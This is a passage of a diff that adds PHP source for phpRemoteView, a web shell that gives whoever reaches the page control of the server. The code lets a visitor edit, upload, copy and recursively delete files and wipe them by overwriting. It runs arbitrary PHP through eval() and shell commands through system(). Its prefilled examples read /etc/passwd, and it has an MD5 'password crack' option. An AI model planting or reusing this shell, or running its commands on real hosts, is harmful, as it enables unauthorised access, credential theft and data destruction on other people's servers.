+            $a1.="<br>";
+            $a2.="<br>";
+         }
+      }
+      //if ($a1!="") $a0.=sprintf("%08X",$i)."<br>";
+      echo "<table border=0 bgcolor=#cccccc cellspacing=1 cellpadding=4 ".
+         "class=sy><tr><td bgcolor=#e0e0e0>$a0</td><td bgcolor=white>".
+         "$a1</td><td bgcolor=white>$a2</td></tr></table><p>";
+   }
+   
+   echo "<b>Base64: </b>
+   <nobr>[<a href=$self?c=base64&c2=0&d=".urlencode($d)."&f=".urlencode($f).">Encode</a>]&nbsp;</nobr>
+   <nobr>[<a href=$self?c=base64&c2=1&d=".urlencode($d)."&f=".urlencode($f).">+chunk</a>]&nbsp;</nobr>
+   <nobr>[<a href=$self?c=base64&c2=2&d=".urlencode($d)."&f=".urlencode($f).">+chunk+quotes</a>]&nbsp;</nobr>
+   <nobr>[<a href=$self?c=base64&c2=3&d=".urlencode($d)."&f=".urlencode($f).">Decode</a>]&nbsp;</nobr>
+   <P>";
+
+
+   if (!$write_access) exitw();
+
+   $msg="";
+   if (!is_file($d.$f) || !$fi=@fopen($d.$f,"r+")) $msg=" (<font color=red><b>".mm("ONLY READ ACCESS")."</b></font>)";
+   else fclose($fi);
+   if (!is_file($d.$f) || !$fi=@fopen($d.$f,"r")) $msg=" (<font color=red><b>".mm("Can't READ file - access denied")."</b></font>)";
+   else fclose($fi);
+   if ($msg=="") $msg=" (".mm("full read/write access").")";
+
+   echo "<b>".mm("FILE SYSTEM COMMANDS")."$msg</b><p>";
+
+   echo "
+<table border=0 cellspacing=0 cellpadding=0><tr>
+
+<td bgcolor=#cccccc><a href=$self?c=e&d=".urlencode($d)."&f=".urlencode($f).
+"><b>&nbsp;&nbsp;".mm("EDIT")."&nbsp;&nbsp;<br>&nbsp;&nbsp;".mm("FILE")."&nbsp;&nbsp;</b></a></td>
+<td>&nbsp;&nbsp;&nbsp;</td>
+
+<td><form action=$self method=post>
+<input type=hidden name=c value=delete>
+<input type=hidden name=c2 value=delete>
+<input type=hidden name=d value=\"".htmlspecialchars($d)."\">
+<input type=hidden name=f value=\"".htmlspecialchars($f)."\">
+<input type=submit value='".mm("DELETE")."'><small>&gt;</small><input type=checkbox name=confirm value=delete></nobr><br>
+<small>".mm("Delete this file")."</small>
+</td><td></form></td><td>&nbsp;&nbsp;&nbsp;</td>
+
+<td><form action=$self method=post>
+<input type=hidden name=c value=delete>
+<input type=hidden name=c2 value=clean>
+<input type=hidden name=d value=\"".htmlspecialchars($d)."\">
+<input type=hidden name=f value=\"".htmlspecialchars($f)."\">
+<input type=submit value='".mm("CLEAN")."'><small>&gt;</small><input type=checkbox name=confirm value=touch></nobr><br>
+<small>".mm("filesize to 0byte")."</small>
+</td><td></form></td><td>&nbsp;&nbsp;&nbsp;</td>
+
+<td><form action=$self method=post>
+<input type=hidden name=c value=delete>
+<input type=hidden name=c2 value=touch>
+<input type=hidden name=d value=\"".htmlspecialchars($d)."\">
+<input type=hidden name=f value=\"".htmlspecialchars($f)."\">
+<input type=submit value='".mm("TOUCH")."'><small>&gt;</small><input type=checkbox name=confirm value=touch></nobr><br>
+<small>".mm("Set current 'mtime'")."</small>
+</td><td></form></td><td>&nbsp;&nbsp;&nbsp;</td>
+
+<td><form action=$self method=post>
+<input type=hidden name=c value=delete>
+<input type=hidden name=c2 value=wipe>
+<input type=hidden name=d value=\"".htmlspecialchars($d)."\">
+<input type=hidden name=f value=\"".htmlspecialchars($f)."\">
+<input type=submit value='".mm("WIPE(delete)")."'><small>&gt;</small><input type=checkbox name=confirm value=delete></nobr><br>
+<small>".mm("Write '0000..' and delete")."</small>
+</td><td></form></td><td>&nbsp;&nbsp;&nbsp;</td>
+</tr></table>
+";
+
+   echo "<form action=$self method=post><input type=hidden name=c value=copy>".
+        "<b>".mm("COPY FILE")."</b> ".mm("from")." <input type=text size=40 name=from value=\"".htmlspecialchars($d.$f)."\">".
+        " ".mm("to")." <input type=text name=to size=40 value=\"".htmlspecialchars($d.$f)."\">".
+        "<nobr><input type=submit value='".mm("COPY")."!'>".
+        "&gt;<input type=checkbox name=confirm value=copy></nobr></form>";
+
+echo "
+<form action=$self method=post>
+<b>".mm("MAKE DIR")."</b> (".mm("type full path").")
+<input type=hidden name=c value=newdir_submit>
+<input type=text size=60 name=df value=\"".htmlspecialchars($d)."\">
+<input type=submit value='".mm("MkDir")."'>
+</form>";
+
+
+echo "
+<form action=$self method=post>
+<b>".mm("CREATE NEW FILE or override old file")."</b><br>
+<input type=hidden name=c value=newfile_submit>
+".mm("Full file name")." <input type=text size=50 name=df value=\"".htmlspecialchars($d.$f)."\">
+<input type=submit value='".mm("CREATE/OVERRIDE")."'>
+<input type=checkbox name=confirm value=1 id=conf1><label for=conf1>&lt;=confirm</label><br>
+<textarea name=text cols=70 rows=10 style='width: 100%;'></textarea><br>
+</form>";
+
+echo "
+<form enctype='multipart/form-data' action='$self' method=post>
+<input type=hidden name=c value=fileupload_submit>
+<b>FILE UPLOAD: ".mm("CREATE NEW FILE or override old file")."</b><br>
+<input type=hidden name='MAX_FILE_SIZE' value=999000000>
+1. ".mm("select file on your local computer").": <input name=userfile type=file><br>
+2. ".mm("save this file on path").": 
+  <input name=df size=50 value=\"$d$f\"><br>
+3. <input type=checkbox name=df2 value=1 id=df2 checked>
+  <label for=df2>".mm("create file name automatic")."</label>
+  &nbsp;&nbsp;".mm("OR")."&nbsp;&nbsp;
+  ".mm("type any file name").":
+  <input name=df3 size=20><br>
+4. <input type=checkbox name=df4 value=1 id=df4>
+  <label for=df4>".mm("convert file name to lovercase")."</label><br>
+<input type=submit value='".mm("Send File")."'>
+</form>";
+
+break;
+
+
+case "base64":
+
+   echo "<pre>\n";
+   $ff=fopen($d.$f,"rb") or exit("<p>access denied");
+   $text=fread($ff,max(filesize($d.$f),$maxsize_fread));
+   fclose($ff);
+   switch ($c2) {
+      case 0:
+         echo base64_encode($text);
+         break;
+      case 1:
+         echo chunk_split(base64_encode($text));
+         break;
+      case 2:
+         $text=base64_encode($text);
+         echo substr(preg_replace("!.{1,76}!","'\\0'.\n",$text),0,-2);
+         break;
+      case 3:
+         echo base64_decode($text);
+         break;
+   }
+   break;
+
+
+
+case "d": // information for DIRECTORY
+
+   echo $GLOBALS['html'];
+   up($d,"","Directory");
+   echo "<a href=$self?&c=l&d=".urlencode($d)."><nobr>&lt;&lt;&lt;<b>".mm("back to directory")."</b> &gt;&gt;&gt;</nobr></a>";
+   echo "<p>";
+
+   //up_link($d,"");
+
+   if (!realpath($d) || !is_dir($d.$f)) exit(mm("dir not found"));
+
+   echo "<table border=0 cellspacing=0 cellpadding=0><tr><td>";
+
+   echo "<table border=0 cellspacing=1 cellpadding=1 class=tab>";
+   echo "<tr class=tr><td>&nbsp;&nbsp;&nbsp;".mm("Owner")."/".mm("Group")."&nbsp;&nbsp;&nbsp;</td><td>";      
+   $tmp=@_posix_getpwuid(fileowner($d.$f));
+   if (!isset($tmp['name']) || $tmp['name']=="") echo fileowner($d.$f)." ";
+   else echo $tmp['name']." ";
+   $tmp=@_posix_getgrgid(filegroup($d.$f));
+   if (!isset($tmp['name']) || $tmp['name']=="") echo filegroup($d.$f);
+   else echo $tmp['name'];
+   echo "</td></tr><tr class=tr><td>";
+   echo mm("Perms")."</td><td>".display_perms(fileperms($d.$f))."</td></tr><tr class=tr><td>";
+   echo mm("Create time")."</td><td>".date("d/m/Y H:i:s",filectime($d.$f))."</td></tr><tr class=tr><td>";
+   echo mm("Access time")."</td><td>".date("d/m/Y H:i:s",fileatime($d.$f))."</td></tr><tr class=tr><td>";
+   echo mm("MODIFY time")."</td><td>".date("d/m/Y H:i:s",filemtime($d.$f))."</td></tr></table>";
+
+   echo "</tD><form action=$self method=get><td width=70>&nbsp;</td><td>
+   <input type=hidden name=c value=\"tree\">
+   Root <input type=text name=d value=\"$d\"><br>
+   <input type=checkbox name=showfile value=1 id=tree1><label for=tree1>Show files in tree</label><br>
+   <input type=checkbox name=showsize value=1 id=tree2 checked><label for=tree2>Show dir/files size</label><br>
+   <input type=submit value='Show TREE directory'>";
+
+   echo "</td></form></tr></table><P>";
+
+
+   
+   if (!$write_access) exitw();
+
+   echo "<b>".mm("FILE SYSTEM COMMANDS")."</b><p>";
+
+   echo "
+<table border=0 cellspacing=0 cellpadding=0><tr>
+
+<td><form action=$self method=post>
+<input type=hidden name=c value=dirdelete>
+<input type=hidden name=c2 value=files>
+<input type=hidden name=d value=\"".htmlspecialchars($d)."\">
+<input type=hidden name=ref value=\"$url\">
+<input type=submit value='".mm("Delete all files in dir")." (rm *)'><small>&gt;</small><input type=checkbox name=confirm value=delete></nobr>
+</td><td></form></td><td>&nbsp;&nbsp;&nbsp;</td>
+
+<td><form action=$self method=post>
+<input type=hidden name=c value=dirdelete>
+<input type=hidden name=c2 value=dir>
+<input type=hidden name=d value=\"".htmlspecialchars($d)."\">
+<input type=hidden name=ref value=\"$url\">
+<input type=submit value='".mm("Delete all dir/files recursive")." (rm -fr)'><small>&gt;</small><input type=checkbox name=confirm value=delete></nobr>
+</td><td></form></td><td>&nbsp;&nbsp;&nbsp;</td>
+
+</tr></table>
+";
+
+echo "
+<form action=$self method=post>
+<b>".mm("MAKE DIR")."</b> (type full path)
+<input type=hidden name=c value=newdir_submit>
+<input type=text size=60 name=df value=\"".htmlspecialchars($d)."\">
+<input type=submit value='".mm("MkDir")."'>
+</form>";
+
+
+echo "
+<form action=$self method=post>
+<b>".mm("CREATE NEW FILE or override old file")."</b><br>
+<input type=hidden name=c value=newfile_submit>
+".mm("Full file name")." <input type=text size=50 name=df value=\"".htmlspecialchars($d)."\">
+<input type=submit value='".mm("CREATE/OVERRIDE")."'>
+<input type=checkbox name=confirm value=1 id=conf1><label for=conf1>&lt;=confirm</label><br>
+<textarea name=text cols=70 rows=10 style='width: 100%;'></textarea><br>
+</form>";
+
+echo "
+<form enctype='multipart/form-data' action='$self' method=post>
+<input type=hidden name=c value=fileupload_submit>
+<b>(FILE UPLOAD) ".mm("CREATE NEW FILE or override old file")."</b><br>
+<input type=hidden name='MAX_FILE_SIZE' value=999000000>
+1. ".mm("select file on your local computer").": <input name=userfile type=file><br>
+2. ".mm("save this file on path").": 
+  <input name=df size=50 value=\"".realpath($d)."/\"><br>
+3. <input type=checkbox name=df2 value=1 id=df2 checked>
+  <label for=df2>".mm("create file name automatic")."</label>
+  &nbsp;&nbsp;".mm("OR")."&nbsp;&nbsp;
+  ".mm("type any file name").":
+  <input name=df3 size=20><br>
+4. <input type=checkbox name=df4 value=1 id=df4>
+  <label for=df4>".mm("convert file name to lovercase")."</label><br>
+<input type=submit value='".mm("Send File")."'>
+</form>";
+
+
+break;
+
+
+
+case "tree":
+
+$tcolors=array(
+'eee','ddd','ccc','bbb','aaa','999','888','988','a88','b88','c88','d88','e88','d98',
+'ca8','bb8','ac8','9d8','8e8','8d9','8ca','8bb','8ac','89d','88e');
+
+function dir_tree($df,$level=0) {
+   global $tcolors,$self;
+
+   $df=str_replace("//","/",$df);
+   $dirs=array();
+   $files=array();
+   if ($dir=opendir($df)) {
+      while (($file=readdir($dir))!==false) {
+         if ($file=="." || $file=="..") continue;
+         if (is_dir("$df/$file"))  {
+            $dirs[]=$file;
+         }
+         else {
+            $files[]=$file;
+         }
+      }
+   }
+   closedir($dir);
+
+   sort($dirs);
+   sort($files);
+   
+   $i=min($level,count($tcolors)-1);
+   $c=$tcolors[$i][0].$tcolors[$i][0].$tcolors[$i][1].$tcolors[$i][1].$tcolors[$i][2].$tcolors[$i][2];
+
+   echo "\r\n\r\n\r\n
+   <table width=100% border=0 cellspacing=2 cellpadding=1><tr><td bgcolor=#000000>
+   <table width=100% border=0 cellspacing=0 cellpadding=1 bgcolor=#$c>
+   <tr><td colspan=3 class=dir>".
+   "<a href=$self?c=l&d=".urlencode($df)." class=dir><img src=$self?name=dir&c=img&1 border=0>".
+   $df."</a></td></tr>";
+
+   if (count($dirs) || count($files)) {
+      echo "<tr><td width=15>&nbsp;</td><td class=all width=97%>";
+      for ($i=0; $i<count($files); $i++) {
+         echo $files[$i]." ";
+      }
+      for ($i=0; $i<count($dirs); $i++) {
+         dir_tree($df."/".$dirs[$i],$level+1);
+      }
+      echo "</td><td width=10>&nbsp;</td></tr>";
+   }
+   echo '</table></td></tr></table>';
+}
+
+   echo "
+   <STYLE>
+   .all {
+   font-family: Verdana;
+   font-size: 80%;
+   }
+   .dir {
+   font-family: Verdana;
+   font-size: 95%;
+   background: #666699;
+   font-weight: bold;
+   color: white
+   }
+   </STYLE>";
+   echo $GLOBALS['html'];
+
+   up($d,"","Directory");
+   echo "<a href=$self?&c=l&d=".urlencode($d)."><nobr>&lt;&lt;&lt;<b>".mm("back to directory")."</b> &gt;&gt;&gt;</nobr></a>";
+   echo "<p>";
+   dir_tree($d);
+   break;
+
+
+
+case "delete":
+
+   if (!$write_access) exitw();
+
+   if (!isset($c2)) exit("err# delete 1");
+   if (!isset($confirm) || strlen($confirm)<3) exit("".mm("Confirm not found (go back and set checkbox)")."");
+   echo "<a href=$self?&c=l&d=".urlencode($d)."><nobr>&lt;&lt;&lt;<b>".mm("back to directory")."</b> &gt;&gt;&gt;</nobr></a><p>";
+   if (!isset($d) || !isset($f) || !@file_exists($d.$f) || !@realpath($d.$f)) 
+      exit("".mm("Delete cancel - File not found")."");
+   if (realpath(getenv("SCRIPT_FILENAME"))==$d.$f && !isset($delete_remview_confirm))
+      exit(mm("Do you want delete this script (phpRemoteView) ???")."<br><br><br><br>
+      <a href='$self?c=delete&c2=$c2&confirm=delete&d=".urlencode($d)."&f=".urlencode($f)."&delete_remview_confirm=YES'>[".mm("YES").", ".mm("DELETE")." <b>".mm("ME")."</b>]</a>
+       &nbsp; &nbsp; &nbsp;
+      <a href='javascript:history.back(-1)'>[".mm("NO (back)")."]</a>");
+
+   switch ($c2) {
+   case "delete":
+       //exit("$d $f");
+       ob();
+       if (!unlink($d.$f)) 
+          obb().exit("<font color=red><b>".mm("Delete cancel")." - ".mm("ACCESS DENIED")."</b></font>$obb"); 
+       Header("Location: $self?c=l&d=".urlencode($d));
+       echo "<P><a href=$self?c=l&d=".urlencode($d).">".mm("done (go back)")."!</a><p>";
+       echo "".mm("Delete ok")."";
+       break;
+   case "touch":
+       ob();
+       if (!touch($d.$f)) 
+          obb().exit("<font color=red><b>".mm("Touch cancel")." - ".mm("ACCESS DENIED")."</b></font>$obb"); 
+       Header("Location: $self?c=i&d=".urlencode($d)."&f=".urlencode($f));
+       echo "<a href=$self?c=i&d=".urlencode($d)."&f=".urlencode($f).">".mm("done (go back)")."!</a><p>";
+       echo "".mm("Touch ok (set current time to 'modify time')")."";
+       break;
+   case "clean":
+       ob();
+       $fi=fopen($d.$f,"w+") or 
+          obb().exit("<font color=red><b>".mm("Clean (empty file) cancel")." - ".mm("ACCESS DENIED")."</b></font>obb"); 
+       ftruncate($fi,0);
+       fclose($fi);
+       Header("Location: $self?c=i&d=".urlencode($d)."&f=".urlencode($f));
+       echo "<a href=$self?c=i&d=".urlencode($d)."&f=".urlencode($f).">".mm("done (go back)")."!</a><p>";
+       echo "".mm("Clean ok (file now empty)")."";
+       break;
+   case "wipe":
+       $size=filesize($d.$f);
+       ob();
+       $fi=fopen($d.$f,"w+") or 
+          obb().exit("<font color=red><b>".mm("Wipe cancel - access denied")."</b></font>$obb");
+       $str=md5("phpspbru".mt_rand(0,999999999).time());
+       for ($i=0; $i<5; $i++) $str.=$str; // strlen 1024 byte
+       for ($i=0; $i<intval($size/1024)+1; $i++) fwrite($fi,$str);
+       fclose($fi);
+       ob();
+       if (!unlink($d.$f)) 
+          obb().exit("err# delete 2 - file was rewrite, but not delete...(only write access, delete disable)$obb"); 
+       Header("Location: $self?c=l&d=".urlencode($d));
+       echo "<a href=$self?c=i&d=".urlencode($d).">".mm("done (go back)")."!</a><p>";
+       echo "".mm("Wipe ok (file deleted)")."";
+       break;
+   }
+
+   //Header("Location: $self?c=l&d=".urlencode(dirname($df)));
+   //echo "<a href=$self?c=i&d=".urlencode(dirname($df)).">SAVE NEW FILE DONE (go back)!</a>";
+
+   break;
+
+
+case "dirdelete":
+
+   if (!$write_access) exitw();
+
+function dir_delete($df) {
+   echo "<b>".basename($df)."</b><ul>";
+   if ($dir=opendir($df)) {
+      $i=0;
+      while (($file=readdir($dir))!==false) {
+         if ($file=="." || $file=="..") continue;
+         if (is_dir("$df/$file"))  {
+            dir_delete($df."/".$file);
+         } 
+         else {
+            echo "$file<br>";
+            echo "".mm("DELETE")." <tt>$df/$file</tt> ...<br>";
+            unlink($df."/".$file);
+         }
+         $i++;
+      }
+      //if ($i==0) echo "-empty-<br>";
+   }
+   closedir($dir);
+   echo "</ul>";
+   echo "".mm("DELETE")." ".mm("DIR")." <tt>$df</tt> ...<br>";
+   rmdir("$df/$file");
+}
+
+   if (!isset($c2)) exit("error dirdelete 1");
+   if (!isset($confirm)) exit("".mm("Confirm not found (go back and set checkbox)")."!");
+   $df="$d";
+
+   switch ($c2) {
+
+      case "files":
+         echo "<h3>".mm("Deleting all files in")." <tt>$df</tt> ...</h3>";
+         if ($dir=opendir($df)) {
+            while (($file=readdir($dir))!==false) {
+                if ($file=="." || $file=="..") continue;
+                if (is_dir($df.$file))  {
+                   echo "<big><tt><b>>$file</b></tt></big> ".mm("skip").": ".filetype($df.$file)."<br>";
+                }
+                elseif (is_file($df.$file)) {
+                   echo "<big><tt><b><font color=red>$file</font></b></tt></big> ".mm("deleting")."...";
+                   unlink($df.$file);
+                   echo "<br>";
+                }
+                else {
+                   echo "<big><tt><b>$file</b></tt></big> ".mm("skip").": ".filetype($df.$file)."<br>";
+                }
+            }  
+         }
+         closedir($dir);
+         $ref="$self?c=l&d=".urlencode($d);
+         break;
+   
+      case "dir":
+         echo "<h3>".mm("Deleting all dir/files (recursive) in")." <tt>$df</tt> ...</h3>";
+         dir_delete($df);
+         $ref="$self?c=l&d=".urlencode(realpath($d."/.."));
+         break;
+   }
+   //header("Location: $ref");
+   echo "<p><a href=$ref>".mm("DONE, go back")."</a>";
+   break;
+
+case "copy": 
+
+   if (!$write_access) exitw();
+
+   if (!isset($from) || !@file_exists($from) || !@realpath($from))
+      exit("err# copy 1, file [$from] not found");
+   if (!isset($to) || strlen($to)==0)
+      exit("err# copy 2, file [$to] not found");
+   echo "Copy: ....<hr size=1 noshade>";
+   if (!copy($from,$to)) { 
+      echo "<hr size=1 noshade><font color=red><b>Error!</b></font><p>";
+      echo "View <a href=$self?c=l&d=".urlencode(dirname($from)).">".dirname($from)."<p>";
+   }
+   else
+      echo "".mm("DONE")."!<p>";
+      echo "View <a href=$self?c=l&d=".urlencode(dirname($from)).">".dirname($from)."</a> (dir 'from')<p>";
+      echo "View <a href=$self?c=l&d=".urlencode(dirname($to)).">".dirname($to)."</a> (dir 'to')<p>";
+   break;
+
+
+
+
+case "e": // edit
+
+   if (!$write_access) exitw();
+
+   if (!@realpath($d.$f) || !file_exists($d.$f)) exit("".mm("file not found")."");
+   echo $GLOBALS['html'];
+   up($d,$f);
+   echo "<a href=$self?&c=l&d=".urlencode($d)."><nobr>&lt;&lt;&lt;<b>".mm("back to directory")."</b> &gt;&gt;&gt;</nobr></a>";
+   up_link($d,$f);
+   $msg="";
+   if (!is_file($d.$f) || !$fi=@fopen($d.$f,"r+")) $msg=" (<font color=red><b>".mm("ONLY READ ACCESS (don't edit!)")."</b></font>)";
+   else fclose($fi);
+   if (!is_file($d.$f) || !$fi=@fopen($d.$f,"r")) $msg=" (<font color=red><b>".mm("Can't READ file - access denied (don't edit!)")."</b></font>)";
+   else fclose($fi);
+   if ($msg=="") $msg="(<font color=#009900><b>".mm("full read/write access")."</b></font>)";
+   echo "<p><b>".mm("EDIT FILE")."</b> $msg<p>";
+
+   if (!$fi=@fopen($d.$f,"rb")) exit("".mm("can't open, access denied")."");
+   echo "<form action=$self method=post>
+   <input type=hidden name=c value=e_submit>
+   <input type=hidden name=d value=\"".htmlspecialchars($d)."\">
+   <input type=hidden name=f value=\"".htmlspecialchars($f)."\">
+   <textarea name=text cols=70 rows=20 style='width: 100%;'>".
+   htmlspecialchars(fread($fi,filesize($d.$f)))."</textarea><p>
+   <input type=submit value=' ".mm("SAVE FILE (write to disk)")." '>
+   <input type=checkbox name=confirm value=1 id=conf> 
+   <label for=conf><font color=red><b><= confirm</b></font></label>
+   </form>";
+
+   break;
+
+
+case "e_submit":
+
+   if (!$write_access) exitw();
+
+   if (!realpath($d.$f) || !file_exists($d.$f)) exit("file not found");
+   if (!isset($text)) exit("err# e_submit 1");
+   if (!isset($confirm)) exit("Confirm not found (go back and set checkbox)");
+   if (!$fi=@fopen($d.$f,"w+")) exit("access denied");
+   fwrite($fi,$text);
+   fclose($fi);
+   Header("Location: $self?c=i&d=".urlencode($d)."&f=".urlencode($f));
+   echo "<a href=$self?c=i&d=".urlencode($d)."&f=".urlencode($f).">SAVE DONE (go back)!</a>";
+
+   break;
+
+
+
+case "newfile_submit":
+
+   if (!$write_access) exitw();
+
+   if (!isset($text) || !isset($df)) exit("err# newfile_submit 1");
+   if (!isset($confirm)) exit("Confirm not found (go back and set checkbox)");
+   if (!$fi=@fopen($df,"w+")) exit("access denied, can't create/open [$df]");
+   fwrite($fi,$text);
+   fclose($fi);
+   Header("Location: $self?c=l&d=".urlencode(dirname($df)));
+   echo "<a href=$self?c=i&d=".urlencode(dirname($df)).">SAVE NEW FILE DONE (go back)!</a>";
+   break;
+
+
+case "fileupload_submit":
+
+   if (!$write_access) exitw();
+   if (!isset($df)) exit("err# newfile_submit 1");
+   if (!isset($df3)) exit("err# newfile_submit 2");
+
+   $fname="";
+   if (isset($df2)) { 
+      if (!preg_match("~([^/]+)$~",$HTTP_POST_FILES['userfile']['name'],$ok)) {
+         exit("Upload failed: can't detect file name");
+      }
+      $fname=$ok[1];
+   }
+   else {
+      $fname=$df3;
+   }
+   if ($fname=="") 
+     exit("".mm("You mast checked 'create file name automatic' OR typed file name!").""); 
+   if (isset($df4)) $fname=strtolower($fname);
+
+   echo "Temp file: ".$HTTP_POST_FILES['userfile']['tmp_name']."<br>";
+   echo "Origin file name: ".$HTTP_POST_FILES['userfile']['name']."<br>";
+   echo "File size: ".$HTTP_POST_FILES['userfile']['size']."<br>";
+   if ($df[strlen($df)-1]!="/") $df.="/";
+   echo "".mm("SAVING TO").": <font color=blue>$df</font><font color=red><b>$fname</b></font><p>";
+
+   ob();
+   $ok=copy($HTTP_POST_FILES['userfile']['tmp_name'],"$df$fname");
+   obb();
+   if (!$ok) exit("<font color=red><b>".mm("Sorry, access denied")."</b></font> $obb");
+
+   if (!isset($ref)) $ref="$self?c=l&d=".urlencode($df);
+   Header("Location: $ref");
+   echo "<a href='$ref'>NEW FILE SAVED</a>";
+  
+   break;
+
+
+case "newdir_submit": 
+
+   if (!$write_access) exitw();
+   if (!isset($df)) exit("err# newdir_submit 1");
+   ob();
+   if (!mkdir($df,$mkdir_mode)) {
+      obb();
+      exit("Access denied $obb");
+   }
+   obb();
+   if (!isset($ref)) $ref="$self?c=l&d=".urlencode($df);
+   Header("Location: $ref");
+   echo "<a href='$ref'>Go to new directory!</a>";
+
+   break;
+
+
+case "t": 
+
+   echo "<h3>
+   <a href='$self'>START PAGE</a> |
+   <a href='$self?c=t'>Eval/Shell</a> | 
+   <a href='$self?c=codes'>Character map</a>
+   </h3>";
+
+
+   if (!$write_access) exitw();
+   error_reporting(2038);
+
+   if (!isset($php)) {
+      $php="/* line 1 */\n\n// ".mm("for example, uncomment next line").":\nphpinfo();\n\n//readfile(\"/etc/passwd\");\n\n/* line 8 */";
+      $skipphp=1;
+      $pre='checked';
+      $nlbr='';
+      $xmp='';
+      $htmls='checked';
+   } 
+
+   echo "<b>".mm("Eval PHP code")."</b> (".mm("don't type")." \"&lt;?\" ".mm("and")." \"?&gt;\")
+<form action=$self method=post>
+<input type=hidden name=c value=t>
+<textarea name=php rows=".(!isset($skipphp)?10:4)." cols=60 style='width:100%;'>$php</textarea>
+<input type=checkbox name=pre value='checked' $pre id='pre'>
+   <label for='pre'> add &lt;pre&gt;</label> &nbsp;
+<input type=checkbox name=xmp value='checked' $xmp id='xmp'>
+   <label for='xmp'> add &lt;xmp&gt;</label> &nbsp;
+<input type=checkbox name=htmls value='checked' $htmls id='htmls'>
+   <label for='htmls'> add htmlspecialchars()</label> &nbsp;
+<input type=checkbox name=nlbr value='checked' $nlbr id='nlbr'>
+   <label for='nlbr'> add nl2br()</label><br>
+<input type=submit></form>
+<P>";
+
+   if (!isset($shell)) $skipshell=1;
+
+   if (!isset($skipphp)) {
+      echo "<hr size=1 noshade>\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n";
+      if ($pre<>'') echo "<pre>";
+      if ($xmp<>'') echo "<xmp>";
+      if ($nlbr<>'' || $htmls<>'') {
+         ob_start();
+      }
+      if ($phpeval_access) eval($php);
+      else die("Sorry, function eval() disabled.");
+      if ($nlbr<>'' || $htmls<>'') {
+         $tmp=ob_get_contents();
+         ob_end_clean(); 
+         if ($htmls<>'') $tmp=htmlspecialchars($tmp);
+         if ($nlbr<>'') $tmp=nl2br($tmp);
+         echo $tmp;
+      }
+      if ($xmp<>'') echo "</xmp>";
+      if ($pre<>'') echo "</pre>";
+      echo "\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n";
+      echo "</table></table></table></table></table></table></table></table></table></center></table><hr size=1 noshade>";
+   }
+
+   if (!isset($shell)) {
+      $shell="#".mm("example (remove comments '#')").": \n\n#cat /etc/passwd;\n\n#ps -ax\n\n#uname -a";
+      $skipshell=1;
+   }
+   echo "<P><b>".mm("Shell commands")."</b>
+<form action=$self method=post>
+<input type=hidden name=c value=t>
+<textarea name=shell rows=".(!isset($skipshell)?10:4)." cols=60 style='width:100%;'>$shell</textarea><br>
+<input type=submit></form>
+<P>";
+   if (!isset($skipshell)) {
+      echo "<hr size=1 noshade>\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n<xmp>";
+      if ($system_access) system($shell);
+      else die("Sorry, function system() disabled.");
+      echo "</xmp>\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n
+      </table></table></table></table></table></table></table></table></table></center><hr size=1 noshade>";
+   }
+
+
+  $ttype=array(1=>"MD5",7=>"Decode MD5 (password crack)<br>",
+  2=>"Base64",3=>"Base64 + chunk",4=>"Base64 + chunk + quotes",
+  5=>"Decode Base64<br>",
+  6=>"UnixTime=>Date(".time().")",
+  8=>"MKtime: YYYY MM DD [hh [mm [ss]]]<br>",
+  9=>"Translit=&gt;RusText", 14=>"RusText=&gt;Translit<br>",
+  10=>"cp1251=&gt;koi8r",11=>"koi8r=&gt;cp1251",12=>"cp1251=&gt;mac",13=>"mac=&gt;cp1251",
+  15=>"koi8r=&gt;mac",16=>"mac=&gt;koi8r",
+  );
+  echo "<P><b>".mm("Universal convert")."</b>";
+
+  echo "<a name=convert></a><form action='$self#convert' method=post>";
+  foreach ($ttype as $k=>$v) 
+     echo "&nbsp;&nbsp;<nobr><input ".($k==$name?"checked":"")." type=radio name=name value=$k id=x$k><label for=x$k>$v</label></nobr> ";
+
+  echo "
+<input type=hidden name=c value=t>
+<textarea name=convert rows=".(isset($convert)?10:3)." cols=60 style='width:100%;'>".htmlspecialchars($convert)."</textarea><br>
+<input type=submit><br>";
+
+   
+   $russtr1="JCUKENGZH_FYVAPROLDESMIT_Bjcukengzh_fyvaproldesmit_b";
+   $russtr2="ÉÖÓÊÅÍÃÇÕÚÔÛÂÀÏÐÎËÄÝÑÌÈÒÜÁéöóêåíãçõúôûâàïðîëäýñìèòüá";
+   function from_translit($ss) {
+      global $russtr1,$russtr2;
+      $w=array("Sch",'Ù',"SCH",'Ù',"ScH",'Ù',"SCh",'Ù',"sch",'ù',"Jo",'¨',"JO",'¨',"jo",'¸',
+      "Zh",'Æ',"ZH",'Æ',"zh",'æ',"Ch",'×',"CH",'×',"ch",'÷',"Sh",'Ø',"SH",'Ø',"sh",'ø',
+      "##",'Ú',"''",'Ü',"Eh",'Ý',"EH",'Ý',"eh",'ý',"Ju",'Þ',"JU",'Þ',"ju",'þ',"Yu",'Þ',
+      "YU",'Þ',"yu",'þ',"YA","ß","Ya","ß","ya","ÿ","Ja",'ß',"JA",'ß',"ja",'ÿ');
+      $c=count($w);
+      for ($i=0; $i<$c; $i+=2) $ss=str_replace($w[$i],$w[$i+1],$ss);
+      $ss=strtr($ss,$russtr1,$russtr2);
+      $ss=preg_replace("!([à-ÿ]+)~([à-ÿ]+)!is","\\1\\2",$ss);
+      return $ss;
+   }
+   function to_translit($ss) {
+      global $russtr1,$russtr2;
+      $ss=strtr($ss,$russtr2,$russtr1);
+      $ss=str_replace(
+         array('Ø', 'Ù',  'Æ', 'ß', '×', 'Þ', '¨', 'ø', 'ù',  'æ', 'ÿ', '÷', 'þ', '¸', ),
+         array('SH','SCH','ZH','YA','CH','YU','YO','sh','sch','zh','ya','ch','yu','yo',),
+         $ss);
+      return $ss;
+   }
+   
+   if (isset($convert)) {
+      if (!isset($name)) $name="0";
+      $out="";
+      switch ($name) {
+
+         case 1: 
+            $out=md5($convert);
+            break;
+
+         case 2:
+            $out=base64_encode($convert);
+            break;
+
+         case 3:
+            $out=chunk_split(base64_encode($convert));
+            break;
+
+         case 4:
+            $out=base64_encode($convert);
+            $out=substr(preg_replace("!.{1,76}!","'\\0'.\n",$out),0,-2);
+            break;
+
+         case 5:
+            $out=base64_decode($convert);
+            break;
+
+         case 6:
+            $convert=intval($convert);
+            if ($convert==0) $convert=time();
+            $out="Unixtime=$convert\n---Day/Month/Year--\n".
